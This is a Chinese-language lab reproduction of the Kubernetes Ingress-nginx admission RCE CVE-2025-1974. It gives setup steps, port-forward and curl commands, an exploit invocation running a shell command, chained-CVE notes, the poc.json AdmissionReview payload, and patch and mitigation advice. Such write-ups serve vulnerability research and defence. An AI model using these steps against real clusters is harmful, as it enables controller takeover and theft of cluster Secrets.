# Kubernetes Ingress-nginx admission 远程代码执行漏洞 CVE-2025-1974 ## 漏洞描述 Ingress-nginx 是 Kubernetes 集群内服务对外暴露的访问接入点,用于承载集群内服务访问流量。其小于 1.12.1 的旧版本中,Kubernetes Ingress-nginx admission 控制器存在一个配置注入漏洞,已获取集群网络访问权限的远程攻击者,可以通过 `ValidatingAdmissionWebhook` 提交一个配置文件进行验证,并在配置文件中插入恶意配置,实现远程代码执行,导致 Ingress-nginx 所在容器被攻击者控制,并可能导致集群内的 Secrets 泄漏。 参考链接: - https://github.com/kubernetes/kubernetes/issues/131009 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1974 - https://github.com/sandumjacob/IngressNightmare-POCs - CVE-2025-24513: [kubernetes/kubernetes#131005](https://github.com/kubernetes/kubernetes/issues/131005) - CVE-2025-24514: [kubernetes/kubernetes#131006](https://github.com/kubernetes/kubernetes/issues/131006) - CVE-2025-1097: [kubernetes/kubernetes#131007](https://github.com/kubernetes/kubernetes/issues/131007) - CVE-2025-1098: [kubernetes/kubernetes#131008](https://github.com/kubernetes/kubernetes/issues/131008) - CVE-2025-1974: [kubernetes/kubernetes#131009](https://github.com/kubernetes/kubernetes/issues/131009) - https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities ## 漏洞影响 ``` Ingress-nginx < v1.11.0 Ingress-nginx v1.11.0 - 1.11.4 Ingress-nginx v1.12.0 ``` ## 环境搭建 安装 minikube 和 kubectl: - [minikube](https://minikube.sigs.k8s.io/docs/start/) - [kubectl](https://kubernetes.io/docs/reference/kubectl/) 启动 minikube,本环境的 minikube、kubectl、Kubernetes Server 版本如下: ``` minikube version ----- minikube version: v1.33.1 commit: 5883c09216182566a63dff4c326a6fc9ed2982ff ``` ``` kubectl version ----- Client Version: v1.30.1 Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3 Server Version: v1.30.0 ``` 下载 Kubernetes Ingress-nginx 1.11.3 的 [deploy.yaml](https://github.com/kubernetes/ingress-nginx/blob/f6456ea86c6c330e7cf401ade70ce1faa757265b/deploy/static/provider/cloud/deploy.yaml),通过 kubectl 部署资源: ``` kubectl apply -f deploy.yaml ``` 部署完成后,可执行以下命令查看 ingress-nginx 命名空间中的 pod: ``` kubectl get pods -n ingress-nginx ----- NAME READY STATUS RESTARTS AGE ingress-nginx-admission-create-jmw9x 0/1 Completed 0 24m ingress-nginx-admission-patch-jbxj6 0/1 Completed 1 24m ingress-nginx-controller-869748796c-p4jvj 1/1 Running 0 24m ``` ![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172307109.png) ## 漏洞复现 查看 webhook 服务器信息,显示服务器正在监听 8443 端口: ``` kubectl describe pod ingress-nginx-controller-869748796c-p4jvj -n ingress-nginx ----- --validating-webhook=:8443 ``` ![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172648584.png) 使用端口转发访问 webhook 端口: ``` kubectl port-forward -n ingress-nginx ingress-nginx-controller-869748796c-p4jvj 1337:8443 ``` ![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172813574.png) 此时,我们已将易受攻击的 webhook 服务器从 pod 转发到本地机器的本地端口 1337。执行 [poc](https://github.com/sandumjacob/IngressNightmare-POCs),发送包含 nginx 配置的 AdmissionRequest: ``` curl --insecure -v -H "Content-Type: application/json" --data @poc.json https://localhost:1337/fake/path ``` ![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413173013506.png) 查看日志,以确保执行成功: ``` kubectl logs ingress-nginx-controller-869748796c-p4jvj -n ingress-nginx ``` ![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413173205563.png) CVE-2025-1974 可以与其他漏洞组合利用: - CVE-2025-1974 + CVE-2025-24514 → auth-url injection → RCE - CVE-2025-1974 + CVE-2025-1097 → auth-tls-match-cn injection → RCE - CVE-2025-1974 + CVE-2025-1098→ mirror UID injection → RCE 本地测试,将端口转发到 `localhost`: ``` kubectl port-forward svc/ingress-nginx-controller -n ingress-nginx 8080:80 kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 8443:443 ``` 执行命令 `touch /tmp/awesome_poc`: ``` ./exp -m c -c 'touch /tmp/awesome_poc' -i https://localhost:8443/networking/v1/ingresses -u http://localhost:8080/fake/addr ``` ![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250414173754627.png) ![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250414173824804.png) ## 漏洞 POC poc.json ```json { "apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview", "request": { "kind": { "group": "networking.k8s.io", "version": "v1", "kind": "Ingress" }, "resource": { "group": "", "version": "v1", "resource": "namespaces" }, "operation": "CREATE", "object": { "metadata": { "name": "deads", "annotations": { "nginx.ingress.kubernetes.io/mirror-host": "test" } }, "spec": { "rules": [ { "host": "jacobsandum.com", "http": { "paths": [ { "path": "/", "pathType": "Prefix", "backend": { "service": { "name": "kubernetes", "port": { "number": 80 } } } } ] } } ], "ingressClassName": "nginx" } } } } ``` ## 漏洞修复 - 更新至 1.11.5 或 1.12.1 及其以上版本。 - 确保 admission webhook 端点没有暴露在外。 缓解措施: - 使用 `controller.admissionWebhooks.enabled=false` 参数重新安装 ingress-nginx; - 删除名为 `ingress-nginx-admission` 的 `ValidatingWebhookConfiguration` ,并从 `ingress-nginx-controller` 容器的 Deployment 或 DaemonSet 中删除 `--validating-webhook` 参数。